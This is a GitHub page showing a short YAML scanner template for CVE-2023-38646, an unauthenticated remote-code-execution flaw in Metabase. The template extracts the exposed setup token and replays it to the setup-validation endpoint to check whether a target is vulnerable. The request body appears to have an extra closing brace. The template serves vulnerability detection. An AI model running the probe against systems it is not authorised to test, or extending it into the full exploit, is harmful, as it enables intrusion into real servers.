-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2023-38646.yaml
39 lines (35 loc) · 1.04 KB
/
CVE-2023-38646.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
id: CVE-2023-38646
info:
name: Metabase - Unauthorized RCE
author: unknown
severity: critical
description: |
Metabase has unauthorized access to execute arbitrary commands.
reference:
- https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
tags: metabase,cve,cve2023
http:
- raw:
- |
GET /api/session/properties HTTP/1.1
Host: {{Hostname}}
- |
POST /api/setup/validate HTTP/2
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 244
{"token":"{{token}}","details":{"is_on_demand":false,"is_full_sync":false,"is_sample":false,"cache_ttl":null,"refingerprint":true,"auto_run_queries":true,"schedules":{},"details":{},"name":"test","engine":"mysql"}}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "we couldn't connect to the database"
extractors:
- type: regex
part: body_1
group: 1
name: token
regex:
- '"setup-token":"(.*?)"'
internal: true